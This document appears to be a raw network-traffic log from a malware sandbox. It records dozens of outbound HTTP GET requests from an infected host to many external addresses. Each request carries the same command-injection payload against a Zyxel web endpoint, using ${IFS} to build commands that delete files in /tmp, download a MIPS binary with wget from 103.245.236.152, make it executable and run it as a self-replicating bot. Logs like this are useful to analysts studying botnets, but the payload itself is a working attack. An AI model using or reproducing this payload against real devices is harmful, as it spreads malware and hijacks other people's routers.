                                          Jan 14, 2024 15:46:32.353431940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8300192.168.2.2355070128.4.210.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353483915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8301192.168.2.2340586141.24.63.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353529930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8302192.168.2.233419687.229.111.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353529930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8303192.168.2.234918865.192.208.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353540897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8304192.168.2.2334290108.118.255.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353560925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8305192.168.2.2345164223.108.105.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353593111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8306192.168.2.2339210169.237.87.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353652954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8307192.168.2.2343512199.218.139.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353698969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8308192.168.2.235319823.43.88.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353705883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8309192.168.2.235687467.177.140.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353718042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8310192.168.2.2360150188.214.109.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353753090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8311192.168.2.234112645.170.57.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353781939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8312192.168.2.236082882.45.14.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353791952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8313192.168.2.2359018168.253.189.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353806973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8314192.168.2.2360320111.246.40.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353851080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8315192.168.2.236044668.195.110.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353904963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8316192.168.2.233964276.9.93.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353910923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8317192.168.2.2360930142.178.77.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353935003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8318192.168.2.2347606191.127.53.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353971004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8319192.168.2.233695496.59.153.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353988886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8320192.168.2.2355470163.11.70.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354027987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8321192.168.2.234455236.84.70.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354049921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8322192.168.2.2351922192.150.36.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354062080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8323192.168.2.233468243.250.243.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354077101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8324192.168.2.233580453.48.42.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354099035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8325192.168.2.2350552102.152.148.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354105949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8326192.168.2.2357058135.96.33.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354159117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8327192.168.2.2348800164.123.217.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354162931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8328192.168.2.2353080174.1.124.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354162931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8329192.168.2.234740658.182.123.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354218960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8330192.168.2.235615699.61.135.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354232073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8331192.168.2.2357110138.54.109.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354268074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8332192.168.2.2347036103.1.147.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354291916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8333192.168.2.2349576177.181.222.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354317904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8334192.168.2.2334392165.206.3.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354353905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8335192.168.2.2341130176.126.202.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354397058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8336192.168.2.2355332182.205.194.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354412079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8337192.168.2.234524013.185.56.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354439020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8338192.168.2.2359144182.213.104.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354454041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8339192.168.2.2359300184.6.214.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354492903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8340192.168.2.234199852.81.20.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354501009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8341192.168.2.2335472188.153.101.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354525089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8342192.168.2.234825219.203.142.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354557991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8343192.168.2.234809420.60.59.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354578972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8344192.168.2.2337622159.140.31.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354605913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8345192.168.2.2360128176.137.90.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354666948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8346192.168.2.2351888133.181.96.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354693890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8347192.168.2.2349156116.235.220.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354717016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8348192.168.2.2355474175.81.24.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354768038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8349192.168.2.2348092206.22.68.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354789019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8350192.168.2.234064677.188.239.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354830027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8351192.168.2.2334886109.114.138.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354845047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8352192.168.2.2348284138.18.155.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354881048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8353192.168.2.2358792161.26.197.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354923964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8354192.168.2.233892479.98.13.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354948044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8355192.168.2.235903424.107.125.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.354984045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8356192.168.2.235935092.215.189.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355006933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8357192.168.2.2346264132.120.32.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355037928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8358192.168.2.2346038176.7.64.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355061054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8359192.168.2.2337634211.246.215.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355062962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8360192.168.2.23370145.13.91.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355099916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8361192.168.2.235658817.209.239.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.355128050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8362192.168.2.23464849.253.249.148443
                                          TimestampBytes transferredDirectionData
